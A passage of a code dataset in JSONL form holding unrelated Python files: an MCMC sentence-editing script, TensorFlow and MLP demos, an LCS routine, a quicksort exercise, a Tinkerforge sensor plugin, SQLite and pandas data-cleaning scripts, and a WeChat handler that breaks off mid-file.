pos_set:\n\t\t\t# \t\tpos_set[-1] = 0\n\t\t\tkeep_non = config.keep_non\n\t\t\tmasked_sent, adjusted_pos_set = mask_sentence(input_ids, pos_set, action_set)\n\t\t\tprev_inds = pos_set\n\n\t\t\tproposal_prob = 1.0 # Q(x'|x)\n\t\t\tproposal_prob_reverse = 1.0 # Q(x|x')\n\t\t\tinput_ids_tmp = np.array(masked_sent) # copy\n\t\t\tsequence_length_tmp = sequence_length\n\n\t\t\tfor step_i in range(len(pos_set)):\n\n\t\t\t\tind = adjusted_pos_set[step_i]\n\t\t\t\tind_old = pos_set[step_i]\n\t\t\t\taction = action_set[step_i]\n\t\t\t\tif config.restrict_constr:\n\t\t\t\t\tif step_i == len(pos_set) - 1:\n\t\t\t\t\t\tuse_constr = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tuse_constr = False\n\t\t\t\telse:\n\t\t\t\t\tuse_constr = True\n\t\t\t\t#word replacement (action: 0)\n\t\t\t\tif action==0:\n\t\t\t\t\tprob_mask = bert_scorer.mask_score(input_ids_tmp, ind, mode=0)\n\t\t\t\t\tinput_candidate, prob_candidate, reverse_candidate_idx, _ = \\\n\t\t\t\t\t\tgenerate_candidate_input_with_mask(input_ids_tmp, sequence_length_tmp, ind, prob_mask, config.search_size,\n\t\t\t\t\t\t old_tok=input_ids[ind_old], mode=action)\n\t\t\t\t\tif sim is not None and use_constr:\n\t\t\t\t\t\tsimilarity_candidate=similarity_batch(input_candidate, input_original,sta_vec)\n\t\t\t\t\t\tprob_candidate=prob_candidate*similarity_candidate\n\t\t\t\t\tprob_candidate_norm=normalize(prob_candidate)\n\t\t\t\t\tprob_candidate_ind=sample_from_candidate(prob_candidate_norm)\n\t\t\t\t\tinput_ids_tmp = input_candidate[prob_candidate_ind] # changed\n\t\t\t\t\tproposal_prob *= prob_candidate_norm[prob_candidate_ind] # Q(x'|x)\n\t\t\t\t\tproposal_prob_reverse *= prob_candidate_norm[reverse_candidate_idx] # Q(x|x')\n\t\t\t\t\tsequence_length_tmp += 0\n\t\t\t\t\tprint('action:0', prob_candidate_norm[prob_candidate_ind], prob_candidate_norm[reverse_candidate_idx])\n\n\t\t\t\t#word insertion(action:1)\n\t\t\t\tif action==1:\n\t\t\t\t\tprob_mask = bert_scorer.mask_score(input_ids_tmp, ind, mode=0)\n\n\t\t\t\t\tinput_candidate, prob_candidate, reverse_candidate_idx, non_idx = \\\n\t\t\t\t\t\tgenerate_candidate_input_with_mask(input_ids_tmp, sequence_length_tmp, ind, prob_mask, config.search_size,\n\t\t\t\t\t\t mode=action, old_tok=input_ids[ind_old], keep_non=keep_non)\n\n\t\t\t\t\tif sim is not None and use_constr:\n\t\t\t\t\t\tsimilarity_candidate=similarity_batch(input_candidate, input_original,sta_vec)\n\t\t\t\t\t\tprob_candidate=prob_candidate*similarity_candidate\n\t\t\t\t\tprob_candidate_norm=normalize(prob_candidate)\n\t\t\t\t\tprob_candidate_ind=sample_from_candidate(prob_candidate_norm)\n\t\t\t\t\tinput_ids_tmp = input_candidate[prob_candidate_ind]\n\t\t\t\t\tif prob_candidate_ind == non_idx:\n\t\t\t\t\t\tif input_ids_tmp[-1] == PAD_IDX:\n\t\t\t\t\t\t\tinput_ids_tmp = input_ids_tmp[:-1]\n\t\t\t\t\t\tprint('action:1 insert non', 1.0, 1.0)\n\t\t\t\t\telse:\n\t\t\t\t\t\tproposal_prob *= prob_candidate_norm[prob_candidate_ind] # Q(x'|x)\n\t\t\t\t\t\tproposal_prob_reverse *= 1.0 # Q(x|x'), reverse action is deleting\n\t\t\t\t\t\tsequence_length_tmp += 1\n\t\t\t\t\t\tprint('action:1', prob_candidate_norm[prob_candidate_ind], 1.0)\n\n\t\t\t\t#word deletion(action: 2)\n\t\t\t\tif action==2:\n\t\t\t\t\tinput_ids_for_del = np.concatenate([input_ids_tmp[:ind], [MASK_IDX], input_ids_tmp[ind:]])\n\t\t\t\t\tif keep_non:\n\t\t\t\t\t\tnon_cand = np.array(input_ids_for_del)\n\t\t\t\t\t\tnon_cand[ind] = input_ids[ind_old]\n\t\t\t\t\t\tinput_candidate = np.array([input_ids_tmp, non_cand])\n\t\t\t\t\t\tprob_candidate = np.array([bert_scorer.sent_score(x) for x in input_candidate])\n\t\t\t\t\t\tnon_idx = 1\n\t\t\t\t\t\tif sim is not None and use_constr:\n\t\t\t\t\t\t\tsimilarity_candidate=similarity_batch(input_candidate, input_original,sta_vec)\n\t\t\t\t\t\t\tprob_candidate=prob_candidate*similarity_candidate\n\t\t\t\t\t\tprob_candidate_norm=normalize(prob_candidate)\n\t\t\t\t\t\tprob_candidate_ind=sample_from_candidate(prob_candidate_norm)\n\t\t\t\t\t\tinput_ids_tmp = input_candidate[prob_candidate_ind]\n\t\t\t\t\telse:\n\t\t\t\t\t\tnon_idx = -1\n\t\t\t\t\t\tprob_candidate_ind = 0\n\t\t\t\t\t\tinput_ids_tmp = input_ids_tmp # already deleted\n\n\t\t\t\t\tif prob_candidate_ind == non_idx:\n\t\t\t\t\t\tprint('action:2 delete non', 1.0, 1.0)\n\t\t\t\t\telse:\n\t\t\t\t\t\t# add mask, for evaluating reverse probability\n\t\t\t\t\t\tprob_mask = bert_scorer.mask_score(input_ids_for_del, ind, mode=0)\n\t\t\t\t\t\tinput_candidate, prob_candidate, reverse_candidate_idx, _ = \\\n\t\t\t\t\t\t\tgenerate_candidate_input_with_mask(input_ids_for_del, sequence_length_tmp, ind, prob_mask,\n\t\t\t\t\t\t\t config.search_size, mode=0, old_tok=input_ids[ind_old])\n\n\t\t\t\t\t\tif sim!=None:\n\t\t\t\t\t\t\tsimilarity_candidate=similarity_batch(input_candidate, input_original,sta_vec)\n\t\t\t\t\t\t\tprob_candidate=prob_candidate*similarity_candidate\n\t\t\t\t\t\tprob_candidate_norm = normalize(prob_candidate)\n\n\t\t\t\t\t\tproposal_prob *= 1.0 # Q(x'|x)\n\t\t\t\t\t\tproposal_prob_reverse *= prob_candidate_norm[reverse_candidate_idx] # Q(x|x'), reverse action is inserting\n\t\t\t\t\t\tsequence_length_tmp -= 1\n\n\t\t\t\t\t\tprint('action:2', 1.0, prob_candidate_norm[reverse_candidate_idx])\n\n\t\t\tnew_prob = def_sent_scorer(tokenizer.decode(input_ids_tmp))\n\t\t\tnew_prob *= penalty_constraint(searcher.count_unsafisfied_constraint(searcher.sent2tag(input_ids_tmp)))\n\t\t\tif config.mode == 'sentiment':\n\t\t\t\tnew_prob *= get_sentiment_score(input_ids_tmp, sentiment)\n\t\t\tif sim != None:\n\t\t\t\tsim_constr = similarity(input_ids_tmp, input_original, sta_vec)\n\t\t\t\tnew_prob *= sim_constr\n\t\t\tinput_text_tmp = tokenizer.decode(input_ids_tmp)\n\t\t\tall_samples.append([input_text_tmp,\n\t\t\t new_prob,\n\t\t\t searcher.count_unsafisfied_constraint(searcher.sent2tag(input_ids_tmp)),\n\t\t\t bert_scorer.sent_score(input_ids_tmp, log_prob=True),\n\t\t\t gpt2_scorer.sent_score(input_text_tmp, ppl=True)])\n\t\t\tif tokenizer.decode(input_ids_tmp) not in output_p:\n\t\t\t\toutputs.append(all_samples[-1])\n\t\t\tif outputs != []:\n\t\t\t\toutput_p.append(outputs[-1][0])\n\t\t\tif proposal_prob == 0.0 or old_prob == 0.0:\n\t\t\t\talpha_star = 1.0\n\t\t\telse:\n\t\t\t\talpha_star = (proposal_prob_reverse * new_prob) / (proposal_prob * old_prob)\n\t\t\talpha = min(1, alpha_star)\n\t\t\tprint(tokenizer.decode(input_ids_tmp).encode('utf8', errors='ignore'))\n\t\t\tprint(alpha, old_prob, proposal_prob, new_prob, proposal_prob_reverse)\n\t\t\tproposal_cnt += 1\n\t\t\tif choose_action([alpha, 1 - alpha]) == 0 and (\n\t\t\t\t\tnew_prob > old_prob * config.threshold or just_acc() == 0):\n\t\t\t\tif tokenizer.decode(input_ids_tmp) != tokenizer.decode(input_ids):\n\t\t\t\t\taccept_cnt += 1\n\t\t\t\t\tprint('Accept')\n\t\t\t\t\tall_acc_samples.append(all_samples[-1])\n\t\t\t\tinput_ids = input_ids_tmp\n\t\t\t\tsequence_length = sequence_length_tmp\n\t\t\t\told_prob = new_prob\n\n\n\t\t# choose output from samples\n\t\tfor num in range(config.min_length, 0, -1):\n\t\t\toutputss = [x for x in outputs if len(x[0].split()) >= num]\n\t\t\tprint(num, outputss)\n\t\t\tif outputss != []:\n\t\t\t\tbreak\n\t\tif outputss == []:\n\t\t\toutputss.append([tokenizer.decode(input_ids), 0])\n\t\toutputss = sorted(outputss, key=lambda x: x[1])[::-1]\n\t\twith open(config.use_output_path, 'a') as g:\n\t\t\tg.write(outputss[0][0] + '\\t' + str(outputss[0][1]) + '\\n')\n\t\tall_chosen_samples.append(outputss[0])\n\n\t\tprint('Sentence %d, used time %.2f\\n' % (sen_id, time.time()-start_time))\n\tprint(proposal_cnt, accept_cnt, float(accept_cnt/proposal_cnt))\n\n\tprint(\"All samples:\")\n\tall_samples_ = list(zip(*all_samples))\n\tfor metric in all_samples_[1:]:\n\t\tprint(np.mean(np.array(metric)))\n\n\tprint(\"All accepted samples:\")\n\tall_samples_ = list(zip(*all_acc_samples))\n\tfor metric in all_samples_[1:]:\n\t\tprint(np.mean(np.array(metric)))\n\n\tprint(\"All chosen samples:\")\n\tall_samples_ = list(zip(*all_chosen_samples))\n\tfor metric in all_samples_[1:]:\n\t\tprint(np.mean(np.array(metric)))\n\n\twith open(config.use_output_path + '-result.csv', 'w', newline='') as f:\n\t\tcsv_writer = csv.writer(f, delimiter='\\t')\n\t\tcsv_writer.writerow(['Sentence', 'Prob_sim', 'Constraint_num', 'Log_prob', 'PPL'])\n\t\tcsv_writer.writerows(all_samples)\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"key_gen/sentiment_key_gen_base.py","file_name":"sentiment_key_gen_base.py","file_ext":"py","file_size_in_byte":10763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"218607906","text":"# INSERT Command\n\n# import the sqlite3 library \nimport sqlite3\n\n# create the connection object\nconn = sqlite3.connect(\"new.db\")\n\n# get a cursor object to execute SQL commands\nc = conn.cursor()\n\ntry:\n\t# insert data\n\tc.execute(\"INSERT INTO population VALUES('New York City', 'NY', 8400000)\")\n\tc.execute(\"INSERT INTO population VALUES('San Francisco', 'CA', 800000)\")\n\n\t# commit the changes\n\tconn.commit()\nexcept sqlite3.OperationalError:\n\tprint(\"Oops! Something went wrong. Try again...\")\n\n# close the database connection\nconn.close()\n\n","sub_path":"02_sql.py","file_name":"02_sql.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"264993353","text":"#!/usr/bin/env python3\n\nimport os\nimport numpy as np\nimport tensorflow as tf\ntf.compat.v1.reset_default_graph\n\nsess = tf.compat.v1.Session()\n\nx_vals = np.concatenate((np.random.normal(-1, 1, 50), np.random.normal(3, 1, 50)))\ny_vals = np.concatenate((np.repeat(0., 50), np.repeat(1., 50)))\nx_data = tf.compat.v1.placeholder(shape=[1], dtype=tf.float32)\ny_target = tf.compat.v1.placeholder(shape=[1], dtype=tf.float32)\n\nA = tf.compat.v1.Variable(tf.compat.v1.random_normal(mean=10, shape=[1]))\n\nmy_output = tf.compat.v1.add(x_data, A)\n\nmy_output_expanded = tf.compat.v1.expand_dims(my_output, 0)\ny_target_expanded = tf.compat.v1.expand_dims(y_target, 0)\n\ninit = tf.compat.v1.global_variables_initializer()\nsess.run(init)\n\nxentropy = tf.compat.v1.nn.sigmoid_cross_entropy_with_logits(logits=my_output_expanded, labels=y_target_expanded)\n\nmy_opt = tf.compat.v1.train.GradientDescentOptimizer(0.05)\ntrain_step = my_opt.minimize(xentropy)\n\nfor i in range(1400):\n rand_index = np.random.choice(100)\n rand_x = [x_vals[rand_index]]\n rand_y = [y_vals[rand_index]]\n\n sess.run(train_step, feed_dict={x_data: rand_x, y_target: rand_y})\n if (i + i) % 200 == 0:\n print('Step #' + str(i + 1) + ' A = ' + str(sess.run(A)))\n print('Loss = ' + str(sess.run(xentropy, feed_dict={x_data: rand_x, y_target: rand_y})))\n\npredictions = []\nfor i in range(len(x_vals)):\n x_val = [x_vals[i]]\n prediction = sess.run(tf.compat.v1.round(tf.compat.v1.sigmoid(my_output)), feed_dict={x_data: x_val})\n predictions.append(prediction[0])\n\naccuracy = sum(x==y for x,y in zip(predictions, y_vals)) / 100.\nprint('Ending Accuracy = ' + str(np.round(accuracy, 2)))","sub_path":"01_TensorFlow_Way/05_Implementing_Back_Propagation/05_back_propagation_classification.py","file_name":"05_back_propagation_classification.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"97039413","text":"import tensorflow as tf\nimport math\n\ndef mlp(input_x, image_pixels=28, hidden_units=100, num_classes=10):\n hid_w = tf.Variable(tf.truncated_normal([image_pixels * image_pixels, hidden_units],stddev=1.0 / image_pixels), name='hid_w')\n hid_b = tf.Variable(tf.zeros([hidden_units]), name='hid_b')\n\n sm_w = tf.Variable(tf.truncated_normal([hidden_units, 10], stddev=1.0 / math.sqrt(hidden_units)), name='sm_w')\n sm_b = tf.Variable(tf.zeros([num_classes]), name='sm_b')\n\n hid_lin = tf.nn.xw_plus_b(input_x, hid_w, hid_b)\n hid = tf.nn.relu(hid_lin)\n\n logits = tf.add(tf.matmul(hid, sm_w), sm_b)\n return logits\n\n\n","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"353765637","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass FilesNotSyncingError(Model):\n \"\"\"Files not syncing error object.\n\n Variables are only populated by the server, and will be ignored when\n sending a request.\n\n :ivar error_code: Error code (HResult)\n :vartype error_code: int\n :ivar persistent_count: Count of persistent files not syncing with the\n specified error code\n :vartype persistent_count: long\n :ivar transient_count: Count of transient files not syncing with the\n specified error code\n :vartype transient_count: long\n \"\"\"\n\n _validation = {\n 'error_code': {'readonly': True},\n 'persistent_count': {'readonly': True},\n 'transient_count': {'readonly': True},\n }\n\n _attribute_map = {\n 'error_code': {'key': 'errorCode', 'type': 'int'},\n 'persistent_count': {'key': 'persistentCount', 'type': 'long'},\n 'transient_count': {'key': 'transientCount', 'type': 'long'},\n }\n\n def __init__(self, **kwargs) -> None:\n super(FilesNotSyncingError, self).__init__(**kwargs)\n self.error_code = None\n self.persistent_count = None\n self.transient_count = None\n","sub_path":"sdk/storage/azure-mgmt-storagesync/azure/mgmt/storagesync/models/files_not_syncing_error_py3.py","file_name":"files_not_syncing_error_py3.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"598823371","text":"\"\"\"\n求解最长公共子序列\n\nref:http://wordaligned.org/articles/longest-common-subsequence\n\"\"\"\n\nfrom collections import defaultdict, namedtuple\nfrom itertools import product\n\n\ndef lcs_grid(xs, ys, eq):\n \"\"\"Create a grid for longest common subsequence calculations.\n \n Returns a grid where grid[(j, i)] is a pair (n, move) such that\n - n is the length of the LCS of prefixes xs[:i], ys[:j]\n - move is \\, ^, <, or e, depending on whether the best move\n to (j, i) was diagonal, downwards, or rightwards, or None.\n \n Example:\n T A R O T\n A 0< 1\\ 1< 1< 1<\n R 0< 1^ 2\\ 2< 2<\n T 1\\ 1< 2^ 2< 3\\\n \"\"\"\n Cell = namedtuple('Cell', 'length move')\n grid = defaultdict(lambda: Cell(0, 'e'))\n sqs = product(enumerate(ys), enumerate(xs))\n for (j, y), (i, x) in sqs:\n if eq(x, y):\n cell = Cell(grid[(j - 1, i - 1)].length + 1, '\\\\')\n else:\n left = grid[(j, i - 1)].length\n over = grid[(j - 1, i)].length\n if left < over:\n cell = Cell(over, '^')\n else:\n cell = Cell(left, '<')\n grid[(j, i)] = cell\n return grid\n\n\ndef lcs(xs, ys, eq=lambda x, y: x == y):\n \"\"\"Return a longest common subsequence of xs, ys.\"\"\"\n # Create the LCS grid, then walk back from the bottom right corner\n grid = lcs_grid(xs, ys, eq)\n i, j = len(xs) - 1, len(ys) - 1\n lcs = list()\n for move in iter(lambda: grid[(j, i)].move, 'e'):\n if move == '\\\\':\n lcs.append((i, j))\n i -= 1\n j -= 1\n elif move == '^':\n j -= 1\n elif move == '<':\n i -= 1\n lcs.reverse()\n return lcs\n","sub_path":"grader/common/lcs.py","file_name":"lcs.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"402091000","text":"# 215\n# 排序算法联系写个快排\n\ndef quicksort(arr, left, right):\n if left >= right:\n return\n key = arr[left]\n l, r = left, right\n while l < r:\n while arr[r] >= key and l < r:\n r -= 1\n while arr[l] < key and l < r:\n l += 1\n \n arr[l], arr[r] = arr[r], arr[l]\n quicksort(arr, left, l)\n quicksort(arr, r + 1, right)\n\ndef quick(arr):\n quicksort(arr, 0, len(arr) - 1)\n\n\ndef findKthLargest(nums, k):\n quick(nums)\n return nums[-k]\n\nt = [3, 2, 1, 5, 6, 4]\nt.sort()\nprint(t)\n","sub_path":"algorithm/leetcode/数组问题/数组中的第k个最大元素.py","file_name":"数组中的第k个最大元素.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"110484302","text":"# -*- coding: utf-8 -*- \n\"\"\"\nAnalog In Plugin\nCopyright (C) 2011-2012 Olaf Lüke \nCopyright (C) 2014 Matthias Bolte \n\nanalog_in.py: Analog In Plugin Implementation\n\nThis program is free software; you can redistribute it and/or\nmodify it under the terms of the GNU General Public License \nas published by the Free Software Foundation; either version 2 \nof the License, or (at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\nGeneral Public License for more details.\n\nYou should have received a copy of the GNU General Public\nLicense along with this program; if not, write to the\nFree Software Foundation, Inc., 59 Temple Place - Suite 330,\nBoston, MA 02111-1307, USA.\n\"\"\"\n\nfrom brickv.plugin_system.plugin_base import PluginBase\nfrom brickv.plot_widget import PlotWidget\nfrom brickv.bindings.bricklet_analog_in import BrickletAnalogIn\nfrom brickv.async_call import async_call\n\nfrom PyQt4.QtGui import QVBoxLayout, QLabel, QHBoxLayout, QComboBox, QSpinBox\nfrom PyQt4.QtCore import pyqtSignal, Qt\n \nclass VoltageLabel(QLabel):\n def setText(self, text):\n text = \"Voltage: \" + text + \" V\"\n super(VoltageLabel, self).setText(text)\n \nclass AnalogIn(PluginBase):\n qtcb_voltage = pyqtSignal(int)\n \n def __init__(self, *args):\n PluginBase.__init__(self, BrickletAnalogIn, *args)\n \n self.ai = self.device\n \n self.qtcb_voltage.connect(self.cb_voltage)\n self.ai.register_callback(self.ai.CALLBACK_VOLTAGE,\n self.qtcb_voltage.emit) \n \n self.voltage_label = VoltageLabel('Voltage: ')\n \n self.current_value = None\n \n plot_list = [['', Qt.red, self.get_current_value]]\n self.plot_widget = PlotWidget('Voltage [mV]', plot_list)\n\n layout_h2 = QHBoxLayout()\n layout_h2.addStretch()\n layout_h2.addWidget(self.voltage_label)\n layout_h2.addStretch()\n\n layout = QVBoxLayout(self)\n layout.addLayout(layout_h2)\n layout.addWidget(self.plot_widget)\n\n if self.firmware_version >= (2, 0, 1):\n self.combo_range = QComboBox()\n self.combo_range.addItem('Automatic', BrickletAnalogIn.RANGE_AUTOMATIC)\n if self.firmware_version >= (2, 0, 3):\n self.combo_range.addItem('0V - 3.30V', BrickletAnalogIn.RANGE_UP_TO_3V)\n self.combo_range.addItem('0V - 6.05V', BrickletAnalogIn.RANGE_UP_TO_6V)\n self.combo_range.addItem('0V - 10.32V', BrickletAnalogIn.RANGE_UP_TO_10V)\n self.combo_range.addItem('0V - 36.30V', BrickletAnalogIn.RANGE_UP_TO_36V)\n self.combo_range.addItem('0V - 45.00V', BrickletAnalogIn.RANGE_UP_TO_45V)\n self.combo_range.currentIndexChanged.connect(self.range_changed)\n\n layout_h1 = QHBoxLayout()\n layout_h1.addStretch()\n layout_h1.addWidget(QLabel('Range:'))\n layout_h1.addWidget(self.combo_range)\n\n if self.firmware_version >= (2, 0, 3):\n self.spin_average = QSpinBox()\n self.spin_average.setMinimum(0)\n self.spin_average.setMaximum(255)\n self.spin_average.setSingleStep(1)\n self.spin_average.setValue(50)\n self.spin_average.editingFinished.connect(self.spin_average_finished)\n\n layout_h1.addStretch()\n layout_h1.addWidget(QLabel('Average Length:'))\n layout_h1.addWidget(self.spin_average)\n\n layout_h1.addStretch()\n layout.addLayout(layout_h1)\n\n def get_range_async(self, range_):\n self.combo_range.setCurrentIndex(self.combo_range.findData(range_))\n\n def get_averaging_async(self, average):\n self.spin_average.setValue(average)\n\n def start(self):\n if self.firmware_version >= (2, 0, 1):\n async_call(self.ai.get_range, None, self.get_range_async, self.increase_error_count)\n if self.firmware_version >= (2, 0, 3):\n async_call(self.ai.get_averaging, None, self.get_averaging_async, self.increase_error_count)\n async_call(self.ai.get_voltage, None, self.cb_voltage, self.increase_error_count)\n async_call(self.ai.set_voltage_callback_period, 100, None, self.increase_error_count)\n \n self.plot_widget.stop = False\n \n def stop(self):\n async_call(self.ai.set_voltage_callback_period, 0, None, self.increase_error_count)\n \n self.plot_widget.stop = True\n\n def destroy(self):\n pass\n\n def get_url_part(self):\n return 'analog_in'\n\n @staticmethod\n def has_device_identifier(device_identifier):\n return device_identifier == BrickletAnalogIn.DEVICE_IDENTIFIER\n\n def get_current_value(self):\n return self.current_value\n\n def cb_voltage(self, voltage):\n self.current_value = voltage\n self.voltage_label.setText(str(voltage/1000.0))\n\n def range_changed(self, index):\n if index >= 0 and self.firmware_version >= (2, 0, 1):\n range_ = self.combo_range.itemData(index)\n async_call(self.ai.set_range, range_, None, self.increase_error_count)\n\n def spin_average_finished(self):\n self.ai.set_averaging(self.spin_average.value())\n","sub_path":"src/brickv/plugin_system/plugins/analog_in/analog_in.py","file_name":"analog_in.py","file_ext":"py","file_size_in_byte":5459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"501082031","text":"\n# coding: utf-8\n\n# Guided Project\n# ----\n# Preparing Data for SQLite\n\n# **Part 1:** Introduction to the Data\n\n# In[50]:\n\nimport pandas as pd\nimport sqlite3 as sql\n\nacademy_awards = pd.read_csv(\"academy_awards.csv\", encoding=\"ISO-8859-1\")\n\nprint(\"PREVIEW OF ROWS\")\nprint(academy_awards.head(5))\nprint('\\n')\nprint(\"SUMMARY OF UNNAMED COLUMN VALUES\")\nprint(academy_awards[\"Unnamed: 5\"].value_counts())\nprint(academy_awards[\"Unnamed: 6\"].value_counts())\nprint(academy_awards[\"Unnamed: 7\"].value_counts())\nprint(academy_awards[\"Unnamed: 8\"].value_counts())\nprint(academy_awards[\"Unnamed: 9\"].value_counts())\nprint(academy_awards[\"Unnamed: 10\"].value_counts())\n\n\n# **Part 2:** Filtering the Data\n\n# In[51]:\n\nacademy_awards[\"Year\"] = academy_awards[\"Year\"].str[0:4]\nacademy_awards[\"Year\"] = academy_awards[\"Year\"].astype(\"int64\")\n\nlater_than_2000 = academy_awards.loc[academy_awards[\"Year\"] > 2000]\n\naward_categories = [\"Actor -- Leading Role\", \"Actor -- Supporting Role\", \"Actress -- Leading Role\", \"Actress -- Supporting Role\"]\nnominations = later_than_2000.loc[later_than_2000[\"Category\"].isin(award_categories)]\n\n\n# **Part 3:** Cleaning Up the Won? and Unnamed Columns\n\n# In[52]:\n\nreplace_dict = {\"YES\": 1, \"NO\": 0}\nnew_won = nominations[\"Won?\"].map(replace_dict)\nnominations = nominations.assign(Won=new_won)\n\ncols_to_drop = [\"Won?\", \"Unnamed: 5\", \"Unnamed: 6\", \"Unnamed: 7\", \"Unnamed: 8\", \"Unnamed: 9\", \"Unnamed: 10\"]\nfinal_nominations = nominations.drop(cols_to_drop, axis=1)\nfinal_nominations\n\n\n# **Part 4:** Cleaning Up the Additional Info Column\n\n# In[53]:\n\ndef movie_char(row):\n parts = row.split(\" {'\")\n movie = parts[0]\n character = parts[1][0:len(parts[1])-2]\n vals = [movie, character]\n return vals\n\nadd_list = list(final_nominations[\"Additional Info\"])\nparts_list = [movie_char(row) for row in add_list]\nmovie_list = [x[0] for x in parts_list]\nchar_list = [x[1] for x in parts_list]\n\nfinal_nominations = final_nominations.assign(Movie = movie_list)\nfinal_nominations = final_nominations.assign(Character = char_list)\nfinal_nominations = final_nominations.drop(\"Additional Info\", axis=1)\nfinal_nominations\n\n\n# **Part 5:** Exporting to SQLite\n\n# In[54]:\n\nconn = sql.connect(\"nominations.db\")\nfinal_nominations.to_sql(\"nominations\", conn, index=False, if_exists=\"replace\")\n\n\n# **Part 6:** Verifying in SQL\n\n# In[55]:\n\nc = conn.cursor()\n\nquery1 = \"PRAGMA TABLE_INFO(nominations);\"\nc.execute(query1)\nresults = c.fetchall()\nprint(\"TABLE SCHEMA\")\nprint(results)\nprint('\\n')\n\nquery2 = \"SELECT * FROM nominations LIMIT 10;\"\nc.execute(query2)\nresults = c.fetchall()\nprint(\"FIRST 10 ROWS\")\nprint(results)\n\nconn.close()\n\n\n# **Part 7:** Next Steps\n# \n# The suggestions for additonal work all center around the task of getting the entire dataset (not just recent entries, as we did above) into an SQL table with a consistent format. In order to make that happen, we need to understand how the data formats have changed through time.\n# \n# For now, I'm going to park this project, but I may come back at a later time.\n","sub_path":"dataquest_projects/preparing_data_sqlite/preparing_data_sqlite.py","file_name":"preparing_data_sqlite.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"107196275","text":"# Ex. 1\n\ndef u():\n u = 1.0\n while 1 + u != 1:\n u /= 10\n return u * 10\n\nprint('precision is', u())\n\n# Ex. 2\n\ndef ver_add():\n x = 1.0\n y = u()\n z = u()\n return ((x + y) + z) == (x + (y + z))\n\ndef ver_mul():\n x = 3\n y = 0.7\n z = 0.3\n\n # assoc = False\n # Explanation: \n # (x * y) = 2.099999999\n # ((x * y) * z) = 0.6299999999\n # but \n # (y * z) = 0.21\n # (x * (y * z)) = 0.63 \n return ((x * y) * z) == (x * (y * z))\n\nprint('add asoc?', ver_add())\nprint('mul asoc?', ver_mul())\n\n# Ex. 3\n\nimport numpy as np\n\ndef create_sample_matrix(n):\n sample = np.zeros(shape=(n,n))\n for i in range(0,n):\n for j in range(0,n):\n sample[i,j] = i * n + j\n return sample\n\ndef strassen_partition(X, n):\n mid = n//2\n X11 = X[0:mid, 0:mid]\n X12 = X[0:mid, mid:]\n X21 = X[mid:, 0:mid]\n X22 = X[mid:, mid:]\n\n return (X11, X12, X21, X22)\n\ndef strassen_result(C11, C12, C21, C22, n):\n result = np.zeros(shape=(n,n))\n\n mid = n//2\n result[0:mid, 0:mid] = C11\n result[0:mid, mid:] = C12\n result[mid:, 0:mid] = C21\n result[mid:, mid:] = C22\n\n return result\n\ndef strassen_mul(A, B, n, n_min):\n if n <= n_min:\n return A.dot(B)\n else:\n A11, A12, A21, A22 = strassen_partition(A, n)\n B11, B12, B21, B22 = strassen_partition(B, n)\n\n P1 = strassen_mul((A11 + A22), (B11 + B22), n//2, n_min)\n P2 = strassen_mul((A21 + A22), B11, n//2, n_min)\n P3 = strassen_mul(A11, (B12 - B22), n//2, n_min)\n P4 = strassen_mul(A22, (B21 - B11), n//2, n_min)\n P5 = strassen_mul((A11 + A12), B22, n//2, n_min)\n P6 = strassen_mul((A21 - A11), (B11 + B12), n//2, n_min)\n P7 = strassen_mul((A12 - A22), (B21 + B22), n//2, n_min)\n\n C11 = P1 + P4 - P5 + P7\n C12 = P3 + P5\n C21 = P2 + P4\n C22 = P1 + P3 - P2 + P6\n \n return strassen_result(C11, C12, C21, C22, n)\n\nsize = 8\n\nA = create_sample_matrix(size)\nB = create_sample_matrix(size)\n\nprint(A, '\\n')\nprint(B, '\\n')\nprint(strassen_mul(A, B, size, 2))","sub_path":"H1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"109502660","text":"# -*- coding: utf-8 -*-\nimport hashlib\nimport web\nimport lxml\nimport time\nimport os\nimport urllib2,json,urllib\nfrom lxml import etree\nimport pylibmc\nimport random\n \nclass WeixinInterface:\n \n def __init__(self):\n self.app_root = os.path.dirname(__file__)\n self.templates_root = os.path.join(self.app_root, 'templates')\n self.render = web.template.render(self.templates_root)\n \n def GET(self):\n #获取输入参数\n data = web.input()\n signature=data.signature\n timestamp=data.timestamp\n nonce=data.nonce\n echostr=data.echostr\n #自己的token\n token=\"tutuxsfly\"\n #字典序排序\n list=[token,timestamp,nonce]\n list.sort()\n sha1=hashlib.sha1()\n map(sha1.update,list)\n hashcode=sha1.hexdigest()\n #sha1加密算法 \n \n #如果是来自微信的请求,则回复echostr\n if hashcode == signature:\n #print \"true\"\n return echostr\n #return '欢迎光临'\n \n \n def POST(self): \n str_xml = web.data()\n xml = etree.fromstring(str_xml)\n #xml 